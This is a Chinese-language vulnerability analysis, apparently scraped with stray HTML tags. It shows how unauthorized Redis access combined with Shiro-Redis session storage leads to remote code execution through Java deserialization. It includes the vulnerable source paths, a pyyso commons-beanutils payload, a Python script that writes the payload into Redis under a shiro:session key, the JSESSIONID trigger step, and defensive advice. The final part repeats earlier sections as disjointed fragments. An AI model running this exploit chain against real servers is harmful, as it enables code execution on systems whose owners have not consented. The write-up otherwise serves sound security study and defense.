Redis未授权访问配合Shiro-Redis反序列化漏洞利用分析<\/h1>

0x01 漏洞背景<\/h2>

本漏洞利用场景结合了两个安全问题：<\/p>

Redis未授权访问漏洞<\/li>

Shiro-Redis反序列化漏洞<\/li> <\/ol>

当目标系统同时存在Redis未授权访问且配置了Shiro-Redis来存储Session时，攻击者可以通过向Redis写入恶意序列化数据，诱导Shiro反序列化这些数据，最终实现远程代码执行(RCE)。<\/p>

0x02 前置知识<\/h2>

Redis未授权访问<\/h3>
Redis默认监听6379端口，如果未配置认证且未设置防火墙规则，可能导致未授权访问。攻击者可以直接连接Redis服务并执行命令。<\/p>

Shiro框架<\/h3>
Apache Shiro是一个Java安全框架，用于认证、授权、加密和会话管理。<\/p>

Shiro-Redis<\/h3>
Shiro-Redis是一个开源项目，用于将Shiro的Session存储在Redis中，实现分布式Session共享。<\/p>

0x03 漏洞发现与验证<\/h2>

1. 信息收集<\/h3>

使用nmap或Shodan扫描发现6379端口开放Redis服务<\/li>
确认Redis版本为3.2.100（Windows环境）<\/li>

通过redis-cli连接确认未授权访问<\/li> <\/ul>

redis-cli -h <target_ip>
<\/code><\/pre>
2. Redis利用尝试<\/h3>

尝试常见Redis利用方式失败（写webshell、写SSH key等）<\/li>
发现Redis中存储了Shiro Session数据，键名格式为shiro:session:<session_id><\/code><\/li>
观察到Session值以\xac\xed<\/code>开头，表明是Java序列化数据<\/li>
<\/ul>
0x04 漏洞利用原理<\/h2>
1. 利用链分析<\/h3>
攻击者可以通过以下步骤实现RCE：<\/p>

通过Redis未授权访问写入恶意序列化数据<\/li>
诱导Shiro读取并反序列化这些数据<\/li>
触发反序列化漏洞执行任意代码<\/li>
<\/ol>
2. 关键代码分析<\/h3>
漏洞触发点在org.crazycake.shiro.RedisSessionDAO#doReadSession<\/code>：<\/p>
protected<\/span> Session doReadSession<\/span>(<\/span>Serializable sessionId)<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    session =<\/span> (<\/span>Session)<\/span> valueSerializer.<\/span>deserialize<\/span>(<\/span>
<\/span><\/span>        redisManager.<\/span>get<\/span>(<\/span>keySerializer.<\/span>serialize<\/span>(<\/span>sessionRedisKey)));<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>最终反序列化操作在org.crazycake.shiro.serializer.ObjectSerializer#deserialize<\/code>：<\/p>
public<\/span> Object deserialize<\/span>(<\/span>byte<\/span>[]<\/span> bytes)<\/span> throws<\/span> SerializationException {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    ByteArrayInputStream byteStream =<\/span> new<\/span> ByteArrayInputStream(<\/span>bytes);<\/span>
<\/span><\/span>    ObjectInputStream objectInputStream =<\/span> new<\/span> MultiClassLoaderObjectInputStream(<\/span>byteStream);<\/span>
<\/span><\/span>    result =<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span> \/\/ 反序列化触发点
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x05 漏洞利用步骤<\/h2>
1. 环境搭建<\/h3>

启动Redis 3.2.100（Windows环境）<\/li>
部署Shiro-Redis示例项目：
https:\/\/github.com\/alexxiyang\/shiro-redis-spring-boot-tutorial
<\/code><\/pre>
<\/li>
<\/ol>
2. 生成恶意序列化数据<\/h3>
使用pyyso工具生成反序列化payload：<\/p>
import<\/span> pyyso
<\/span><\/span>value =<\/span> pyyso.<\/span>cb1v192("open \/"<\/span>)  # 使用commons-beanutils链<\/span>
<\/span><\/span><\/code><\/pre>3. 写入Redis<\/h3>
使用Python脚本将payload写入Redis：<\/p>
import<\/span> pyyso
<\/span><\/span>import<\/span> socket
<\/span><\/span>
<\/span><\/span>s =<\/span> socket.<\/span>socket()
<\/span><\/span>s.<\/span>connect(("127.0.0.1"<\/span>, 6379<\/span>))
<\/span><\/span>
<\/span><\/span>whatever =<\/span> b<\/span>"123"<\/span>
<\/span><\/span>key =<\/span> b<\/span>"shiro:session:"<\/span> +<\/span> whatever
<\/span><\/span>value =<\/span> pyyso.<\/span>cb1v192("open \/"<\/span>)
<\/span><\/span>
<\/span><\/span># Redis SET命令格式<\/span>
<\/span><\/span>s.<\/span>send(
<\/span><\/span>    b<\/span>"<\/span>\x2a\x33\x0d\x0a\x24\x33\x0d\x0a<\/span>SET<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>    b<\/span>"<\/span>\x24<\/span>"<\/span> +<\/span> str(len(key)).<\/span>encode() +<\/span> b<\/span>"<\/span>\r\n<\/span>"<\/span> +<\/span> key +<\/span> b<\/span>"<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>    b<\/span>"<\/span>\x24<\/span>"<\/span> +<\/span> str(len(value)).<\/span>encode() +<\/span> b<\/span>"<\/span>\r\n<\/span>"<\/span> +<\/span> value +<\/span> b<\/span>"<\/span>\r\n<\/span>"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> b<\/span>"+OK"<\/span> in<\/span> s.<\/span>recv(3<\/span>):
<\/span><\/span>    print("success"<\/span>)
<\/span><\/span><\/code><\/pre>4. 触发漏洞<\/h3>

修改浏览器中的JSESSIONID为写入的key（如"123"）<\/li>
发送请求触发反序列化<\/li>
<\/ol>
0x06 漏洞利用条件<\/h2>

Redis存在未授权访问<\/li>
目标系统使用Shiro框架<\/li>
配置了Shiro-Redis存储Session<\/li>
Shiro环境中存在可利用的反序列化链（如commons-beanutils）<\/li>
<\/ol>
0x07 防御措施<\/h2>


Redis安全配置：<\/p>

设置强密码认证<\/li>
绑定特定IP<\/li>
禁用危险命令<\/li>
使用防火墙限制访问<\/li>
<\/ul>
<\/li>

Shiro安全配置：<\/p>

升级到最新版本<\/li>
使用安全的Session序列化方式<\/li>
配置加密的Redis连接<\/li>
<\/ul>
<\/li>

代码层面：<\/p>

避免使用默认的Java序列化<\/li>
实现安全的反序列化过滤器<\/li>
<\/ul>
<\/li>
<\/ol>
0x08 总结<\/h2>
本漏洞利用结合了Redis未授权访问和Shiro反序列化两个安全问题，通过控制Redis中存储的Session数据，诱导Shiro进行恶意反序列化。这种攻击方式不需要知道Shiro的rememberMe密钥，只要能够访问Redis并写入数据即可实现RCE。<\/p>

Redis未授权访问配合Shiro-Redis反序列化漏洞利用分析<\/h1>

0x02 前置知识<\/h2>

Redis未授权访问<\/h3> Redis默认监听6379端口，如果未配置认证且未设置防火墙规则，可能导致未授权访问。攻击者可以直接连接Redis服务并执行命令。<\/p>

Shiro框架<\/h3> Apache Shiro是一个Java安全框架，用于认证、授权、加密和会话管理。<\/p>

Shiro-Redis<\/h3> Shiro-Redis是一个开源项目，用于将Shiro的Session存储在Redis中，实现分布式Session共享。<\/p>

0x03 漏洞发现与验证<\/h2>

0x04 漏洞利用原理<\/h2>

0x05 漏洞利用步骤<\/h2>

Redis未授权访问<\/h3>
Redis默认监听6379端口，如果未配置认证且未设置防火墙规则，可能导致未授权访问。攻击者可以直接连接Redis服务并执行命令。<\/p>

Shiro框架<\/h3>
Apache Shiro是一个Java安全框架，用于认证、授权、加密和会话管理。<\/p>

Shiro-Redis<\/h3>
Shiro-Redis是一个开源项目，用于将Shiro的Session存储在Redis中，实现分布式Session共享。<\/p>